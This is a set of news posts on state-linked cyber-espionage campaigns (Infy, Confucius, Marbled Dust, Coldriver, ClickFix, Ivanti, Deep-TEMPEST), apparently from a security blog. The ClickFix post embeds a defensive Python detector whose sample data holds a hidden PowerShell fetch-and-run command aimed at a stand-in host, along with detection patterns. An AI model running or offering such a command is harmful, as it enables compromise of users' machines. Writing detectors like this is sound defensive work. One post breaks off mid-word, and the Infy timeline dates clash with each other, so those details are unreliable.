
Infy Hackers Strike Again With New C2 Servers After Iran's Internet Shutdown Ends


Infy group's new attack tactic 

An Iranian hacking group known as Infy (aka Prince of Persia) has advanced its attack tactics to hide its operations. The group also set up new C2 infrastructure during the wave of internet shutdowns imposed earlier this year. The gang stopped configuring its C2 servers on January 8, when experts started monitoring Infy.

In reaction to previous protests, Iranian authorities implemented a nationwide internet shutdown on this day, which probably indicates that even government-affiliated cyber units did not have internet access.

About the campaign 

The new activity was spotted on 26 January 2026 while the gang was setting up its new C2 servers, one day prior to the Iranian government’s internet restrictions. This suggests that the threat actor may be state-sponsored and supported by Iran. 

Infy is one of the many state-sponsored hacking gangs working out of Iran that are infamous for sabotage, spying, and influence campaigns coordinated with Tehran’s strategic goals. However, it also has a reputation as one of the oldest and less famous gangs, staying under the radar and not getting caught, and has worked secretly since 2004 via “laser-focused” campaigns aimed at people for espionage.

The use of modified versions of Foudre and Tonnerre, the latter of which used a Telegram bot probably for data collection and command issuance, was among the new tradecraft linked to the threat actor that SafeBreach revealed in a report released in December 2025. Tornado is the codename for the most recent version of Tonnerre (version 50).

The report also revealed that threat actors replaced the C2 infrastructure for all variants of Tonnerre and Foudre and also released Tornado variant 51 that employs both Telegram and HTTP for C2.

It generates C2 domain names using two distinct techniques: a new DGA algorithm initially, followed by fixed names utilizing blockchain data de-obfuscation. We believe that this novel method offers more flexibility in C2 domain name registration without requiring an upgrade to the Tornado version.

Experts believe that Infy also abused a 1-day security bug in WinRAR to extract the Tornado payload on an infected host to increase the effectiveness of its attacks. The RAR archives were submitted to the VirusTotal platform from India and Germany in December 2025. This means the two countries may have been victims.



Confucius Espionage: Gang Hijacks to Attack Windows Systems Via Malware


Confucius gang strikes again

The Confucius hacking gang, infamous for its cyber-espionage operations and alleged state-sponsored links, has advanced its attack tactics in recent times, shifting from document stealers such as WooperStealer to advanced Python-based backdoors like AnonDoor malware. 

Evidence of this is the December 2024 campaign, which showed the gang’s highly advanced engineering methods: phishing emails carried malicious PowerPoint presentations (Document.ppsx) that showed a “Corrupted Page” notification to victims.

Attack tactic

“The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness,” FortiGuard Labs said.

The infected file consisted of embedded OLE objects that prompted a VBScript command from remote infrastructure, starting a malicious chain.

FortiGuard Labs discovered how this gang has used Office documents and infected LNK files to compromise Windows systems throughout the South Asian region, including organizations in Pakistan. The attack tactic uses DLL side-loading; the malware imitates genuine Windows commands such as fixmapi.exe, to user directories for persistence.

About LNK-based attacks

Earlier this year, Confucius moved to disguise infected LNK files as genuine documents such as “Invoice_Jan25.pdf.lnk.” These files execute PowerShell commands that download malicious DLLs and decoy PDF documents from remote servers, maintaining the illusion of legitimate file access while establishing backdoor access. The downloaded DLL sets up persistence channels and creates Base64-encoded remote host addresses for payload deployment.

Findings

The study found that the final payload remained WooperStealer, modified to extract different file types such as archives, images, documents, and email files with different extensions.

One major development happened in August 2025 with AnonDoor, an advanced Python-based backdoor, different from older .NET-based tools.

Plan forward

According to Fortinet, “the layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility.” 

Organizations are advised to be vigilant against different attack tactics, as cyber criminal gangs keep evolving their methods to escape detection. 

Türkiye-Linked Hackers Exploit Zero-Day in Messaging App to Target Kurdish Military

 

A Türkiye-aligned cyberespionage group, Marbled Dust, has exploited a previously unknown zero-day vulnerability to launch attacks on users of Output Messenger — specifically those associated with the Kurdish military in Iraq, according to a report from Microsoft Threat Intelligence.

The uncovered flaw, now identified as CVE-2025-27920, is a directory traversal vulnerability in the LAN-based Output Messenger application. It enables authenticated users to break out of intended directories, granting access to sensitive system files or allowing the deployment of malicious payloads to the server’s startup folder.

"Attackers could access files such as configuration files, sensitive user data, or even source code, and depending on the file contents, this could lead to further exploitation, including remote code execution," Srimax, the app's developer, stated in a security advisory released in December.

The vulnerability was patched in Output Messenger V2.0.63, but attackers exploited it before updates were applied. Microsoft attributes the campaign to a group tracked as Sea Turtle, SILICON, and UNC1326, known collectively as Marbled Dust.

After infiltrating the Output Messenger Server Manager, attackers installed malware that allowed them to monitor communications, impersonate users, and disrupt internal systems.

"While we currently do not have visibility into how Marbled Dust gained authentication in each instance, we assess that the threat actor leverages DNS hijacking or typo-squatted domains to intercept, log, and reuse credentials, as these are techniques leveraged by Marbled Dust in previously observed malicious activity," Microsoft explained.

Following initial compromise, a backdoor named OMServerService.exe was deployed to establish communication with an attacker-controlled command-and-control server (api.wordinfos[.]com). This enabled the group to gather victim-specific data.

In one example, an Output Messenger client connected to an IP tied to Marbled Dust, likely initiating data exfiltration. Shortly after, the system began collecting files and compressing them into a RAR archive for extraction.

Marbled Dust has a history of targeting Europe and the Middle East, especially telecom, IT firms, and government entities critical of the Turkish regime. The group is known to exploit internet-facing vulnerabilities and compromise DNS registries to carry out man-in-the-middle (MitM) attacks.

"This new attack signals a notable shift in Marbled Dust's capability while maintaining consistency in their overall approach," Microsoft noted. "The successful use of a zero-day exploit suggests an increase in technical sophistication and could also suggest that Marbled Dust's targeting priorities have escalated or that their operational goals have become more urgent."

In recent years, Marbled Dust has been connected to espionage campaigns in the Netherlands, with a focus on ISPs, telecommunication provi

Lostkeys Malware: Russian Group Coldriver Targets Western Officials in Espionage Campaign

 

A new wave of cyber espionage has emerged, with Russian hackers deploying a sophisticated malware strain known as “Lostkeys” to infiltrate the systems of Western officials, journalists, and NGOs. According to researchers from Google’s Threat Intelligence Group, the malware is linked to Coldriver, also known as UNC4057, Star Blizzard, or Callisto—a threat actor believed to be part of Russia’s Federal Security Service (FSB), the successor to the KGB. 

Coldriver has traditionally been involved in phishing operations to steal credentials, but the emergence of Lostkeys demonstrates a significant leap in their cyber capabilities. Lostkeys appears to mark a shift in strategy for the group, moving beyond phishing and into deeper system infiltration. The malware is deployed in a targeted manner, reserved for high-value individuals such as political advisors, think tank members, journalists, and people with known connections to Ukraine.

Activity related to Lostkeys was observed by Google in the early months of 2024—specifically January, March, and April—with evidence suggesting its use might have started as far back as December 2023. The attack begins with a deceptive Captcha page, tricking victims into copying a malicious PowerShell script into the Windows Run dialog. This method, known as “ClickFix,” bypasses typical security filters and exploits user behavior rather than software vulnerabilities. 

Once executed, the script connects to a command-and-control server, downloading a series of payloads uniquely tailored to each victim. In an effort to avoid detection, the malware includes anti-sandbox measures. During the second stage of infection, the script checks the screen resolution of the host machine and halts if it matches known virtual machine environments used by analysts and cybersecurity researchers. If the device passes this check, the malware proceeds to the final stage—a Visual Basic Script that steals data, including specific file types, system details, and active processes. These are exfiltrated back to the attackers using an encoded system that applies a unique two-key substitution cipher for each infected machine. 

Lostkeys appears to be a more refined successor to a previous malware strain known as Spica, which Coldriver also deployed in 2024. While both strains focus on data exfiltration, Lostkeys features a more intricate delivery system and improved obfuscation techniques. Some earlier samples of Lostkeys mimicked legitimate software like Maltego and used executable files instead of PowerShell, though Google has not confirmed if these instances were part of the same campaign or the work of a different threat actor reusing Coldriver’s tactics. 

This development highlights an alarming evolution in state-backed cyber operations, where advanced social engineering and stealth techniques are being increasingly used to infiltrate high-profile targets. As geopolitical tensions persist, the risks posed by such targeted cyber espionage campaigns are expected to grow.

ClickFix Attacks: North Korea, Iran, Russia APT Groups Exploit Social Engineering for Espionage

ClickFix attacks are rapidly becoming a favored tactic among advanced persistent threat (APT) groups from North Korea, Iran, and Russia, particularly in recent cyber-espionage operations. This technique involves malicious websites posing as legitimate software or document-sharing platforms. Targets are enticed through phishing emails or malicious advertising and then confronted with fake error messages claiming a failed document download or access issue. 


To resolve the supposed problem, users are instructed to click a “Fix” button that directs them to run a PowerShell or command-line script. Executing this script allows malware to infiltrate their systems. Microsoft’s Threat Intelligence division highlighted earlier this year that the North Korean group ‘Kimsuky’ utilized a similar approach through a fake “device registration” page. 

A new report from Proofpoint now confirms that Kimsuky, along with Iran’s MuddyWater, Russia’s APT28, and the UNK_RemoteRogue group, deployed ClickFix techniques between late 2024 and early 2025. Kimsuky’s campaign, conducted between January and February 2025, specifically targeted think tanks involved in North Korean policy research. The attackers initially contacted victims using spoofed emails designed to appear as if they were sent by Japanese diplomats. After gaining trust, they provided malicious PDF attachments leading to a counterfeit secure drive. Victims were then asked to manually run a PowerShell command, which triggered the download of a second script that established persistence with scheduled tasks and installed QuasarRAT, all while distracting the victim with a harmless-looking PDF. 

In mid-November 2024, Iran’s MuddyWater launched its campaign, targeting 39 organizations across the Middle East. Victims received phishing emails disguised as urgent Microsoft security alerts, prompting them to run PowerShell scripts with administrative rights. This led to the deployment of ‘Level,’ a remote monitoring and management (RMM) tool used to conduct espionage activities. Meanwhile, Russian group UNK_RemoteRogue focused on two organizations tied to a leading arms manufacturer in December 2024. Attackers used compromised Zimbra servers to send fake Microsoft Office messages. Clicking the embedded links directed victims to fraudulent Microsoft Word pages featuring Russian-language instructions and a video tutorial. 

Victims executing the provided script unknowingly triggered JavaScript that ran PowerShell commands, connecting their systems to a server managed through the Empire C2 framework. Proofpoint also found that APT28, an infamous Russian cyber-espionage unit, used ClickFix tactics as early as October 2024. In that instance, phishing emails mimicked Google Spreadsheet notifications, including a fake reCAPTCHA and a prompt to execute PowerShell commands. Running these commands enabled attackers to create an SSH tunnel and activate Metasploit, providing them with covert access to compromised machines. 

The growing use of ClickFix attacks by multiple state-sponsored groups underscores the method’s effectiveness, primarily due to the widespread lack of caution when executing unfamiliar commands. To avoid falling victim, users should be extremely wary of running scripts or commands they do not recognize, particularly when asked to use elevated privileges.
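A defender-side check for the ClickFix pattern described in this post and in the Lostkeys post above (a command pasted into the Windows Run dialog), added here as an example and not taken from Proofpoint, Google or Microsoft. It reviews Run-dialog history, which Windows keeps per user in the `RunMRU` registry key, and flags entries that combine a script interpreter with remote-fetch or lure indicators; the sample values, indicator patterns and threshold are constructed assumptions.

```python
import re

# Constructed sample of the values found under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (e.g. exported with `reg query`). Each entry's data ends with "\1";
# MRUList gives the order, most recent first. Not real telemetry.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/x | iex" '
         "# I am not a robot: reCAPTCHA ID 1234\\1",
    "d": "\\\\fileserver\\share\\1",
}

# Assumed indicator patterns; tune them for your environment.
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd|curl|msiexec)(\.exe)?\b", re.I)
FETCH_OR_EVAL = re.compile(
    r"https?://|\biex\b|invoke-expression|\biwr\b|invoke-webrequest"
    r"|downloadstring|-enc\w*\s+[A-Za-z0-9+/=]{20,}",
    re.I,
)
# Lure text placed in a trailing comment so the visible part of the
# pasted command looks like a verification message.
LURE_COMMENT = re.compile(r"(#|\brem\s|::).*(robot|captcha|verif)", re.I)


def parse_runmru(values):
    """Return Run-dialog commands, most recent first, without the '\\1' suffix."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue  # MRUList can reference an entry that was deleted
        if data.endswith("\\1"):
            data = data[:-2]
        commands.append(data)
    return commands


def score(command):
    """List the reasons a single Run-dialog entry looks like ClickFix."""
    reasons = []
    if INTERPRETER.search(command):
        reasons.append("script interpreter")
    if FETCH_OR_EVAL.search(command):
        reasons.append("remote fetch or eval")
    if LURE_COMMENT.search(command):
        reasons.append("lure text in trailing comment")
    return reasons


def suspicious(values, threshold=2):
    """Entries with at least `threshold` indicators; a bare 'cmd' is not flagged."""
    hits = []
    for command in parse_runmru(values):
        reasons = score(command)
        if len(reasons) >= threshold:
            hits.append((command, reasons))
    return hits


if __name__ == "__main__":
    for command, reasons in suspicious(SAMPLE_RUNMRU):
        print(f"{', '.join(reasons)}: {command}")
```

A hit is a lead for triage rather than proof of compromise, since administrators also launch interpreters from the Run dialog.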

Chinese Cyber Espionage Suspected in New Ivanti VPN Malware Attack

 

A newly discovered cyberattack campaign targeting Ivanti VPN devices is suspected to be linked to a Chinese cyberespionage group. Security researchers believe the attackers exploited a critical vulnerability in Ivanti Connect Secure, which was patched by the Utah-based company in February. The attack is yet another example of how state-backed Chinese threat actors are rapidly taking advantage of newly disclosed vulnerabilities and frequently targeting Ivanti’s infrastructure.

On Thursday, researchers from Mandiant revealed that a group tracked as UNC5221 exploited a stack-based buffer overflow vulnerability to deploy malicious code from the Spawn malware ecosystem—an attack technique often associated with Chinese state-sponsored activity. Mandiant also identified two previously unknown malware families, which they've named Trailblaze and Brushfire. As seen in earlier attacks tied to Chinese hackers, this group attempted to manipulate Ivanti’s internal Integrity Checker Tool to avoid detection.

The vulnerability, officially tracked as CVE-2025-22457, was used to compromise multiple Ivanti products, including Connect Secure version 22.7R2.5 and earlier, the legacy Connect Secure 9.x line, Policy Secure (Ivanti’s network access control solution), and Zero Trust Access (ZTA) gateways. Ivanti released a patch for Connect Secure on February 11, emphasizing that Policy Secure should not be exposed to the internet, and that "Neurons for ZTA gateways cannot be exploited when in production."

Ivanti acknowledged the attack in a statement: "We are aware of a limited number of customers whose appliances have been exploited." The incident follows warnings from Western intelligence agencies about China's increasing speed and aggression in leveraging newly disclosed software vulnerabilities—often before security teams have time to deploy patches.

Many of the devices targeted were legacy systems no longer receiving software updates, such as the Connect Secure 9.x appliance, which reached end-of-support on December 31, 2024. Older versions of the Connect Secure product line, which were set to be replaced by version 22.7R2.6 as of February 11, were also compromised.

This marks the second consecutive year Ivanti has had to defend its products from persistent attacks by suspected Chinese state-backed hackers. Thursday’s advisory from Mandiant and Ivanti highlights a vulnerability separate from the one flagged in late March by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which had allowed attackers to install a Trojan variant linked to Spawn malware in Ivanti systems.

Iran Spies on Senior Israeli Officials, Launches Over 200 Cyberattacks


Shin Bet, an Israeli cybersecurity service, said recently that it discovered over 200 Iranian phishing attempts targeting top Israeli diplomats to get personal information. Shin Bet believes the attacks were launched by Iranian actors through Telegram, WhatsApp, and email.

The threat actors tried to bait targets into downloading infected apps that would give them access to victim devices and leak personal data like location history and residential addresses.

Iran Targeting Israeli Officials

The targeted senior officials include academicians, politicians, media professionals, and others.

Shin Bet said the stolen information would be used by Iran to launch attacks against Israeli nationals “through Israeli cells they have recruited within the country.” The targets were approached with an “individually tailored cover story for each victim according to their area of work, so the approach doesn’t seem suspicious.”

In one case, the attacker, posing as a Cabinet Secretary, lured the target by saying he wanted to coordinate with PM Benjamin Netanyahu. Shin Bet has tracked the targets involved in the campaign and informed them about the phishing attempts.

“This is another significant threat in the campaign Iran is waging against Israel, aimed at carrying out assassination attacks. We request heightened awareness, as cyberattacks of this type can be avoided before they happen through awareness, caution, suspicion, and proper preventative behavior online,” said a Shin Bet official.

Reasons for attack

Shin Bet “will continue to act to identify Iranian activity and thwart it in advance.” It believes the motive behind the attacks was to manage future attacks on Israeli nationals using information given by Israeli cells recruited by Iran. The campaign is a sign of an escalation between Iran and Israel, the end goal being assassination attempts.

The bigger picture

The recent discovery of phishing campaigns is part of larger targeted campaigns against Israel. In September 2024, 7 Jewish Israelis were arrested for allegedly spying on IDF and Israeli security figures for Iran. 

The Times of Israel reports, “Also in September, a man from the southern city of Ashkelon was arrested on allegations that he was smuggled into Iran twice, received payment to carry out missions on behalf of Tehran, and was recruited to assassinate either Israel’s prime minister, defense minister, or the head of the Shin Bet.”

Hackers Can Now Intercept HDMI Signals Using Deep Learning


Secretly intercepting video signals is a very traditional way to do electronic spying, but experts have found a new method that puts a frightening twist on it.

A team of experts from Uruguay has found that it's possible to intercept electromagnetic radiation from HDMI cables and process the video via AI.

Using deep learning to trace HDMI signals

University of the Republic experts in Montevideo posted their findings on Cornell's arXiv service. As per the findings, you can train an AI model to interpret minute fluctuations in electromagnetic radiation released from an HDMI cable. “In this work, we address the problem of eavesdropping on digital video displays by analyzing the electromagnetic waves that unintentionally emanate from the cables and connectors, particularly HDMI,” the researchers said. Although HDMI is a wired standard and digitally encrypted, these cables release abundant electromagnetic signals that can be tracked without needing direct access.

Detecting and decoding are different, but the experts also found that by pairing an AI model with text recognition software, one can "read" the wirelessly recorded EM radiation with a surprising 70% accuracy.

It is still distant from a traditional recording, but there's still a 60 percent improvement compared to earlier methods, making it capable of stealing passwords and other sensitive info. One can also do it wirelessly without physical access to attack a computer, from outside a building in real-life situations.

A new method for surveillance

Skimming from wireless electromagnetic signals for spying purposes isn't a new thing. It is a vulnerability called TEMPEST (Transient ElectroMagnetic Pulse Emanation Standard, a very awkward backronym) having links to espionage dating back to World War 2. 

However, because HDMI connections are digital transmissions with some kind of encryption utilizing the HDCP standard, they were not thought to be particularly vulnerable to it. The researchers' AI-assisted attack technique (dubbed "Deep-TEMPEST") raises some troubling possibilities.

State-sponsored attacks

According to experts, the system and its related alternatives are already in use by state-sponsored hackers and industrial espionage threat actors. The advanced nature of the methods and the need to be around the target systems suggest that they won’t cause harm to regular users. However, large businesses and government agencies should be on the lookout. To protect their sensitive data, they should consider EM-shielding measures, especially for employees and stakeholders working from home.

“The proposed system is based on widely available Software Defined Radio and is fully open-source, seamlessly integrated into the popular GNU Radio framework. We also share the dataset we generated for training, which comprises both simulated and over 1000 real captures. Finally, we discuss some countermeasures to minimize the potential risk of being eavesdropped by systems designed based on similar principles,” concluded experts in the report.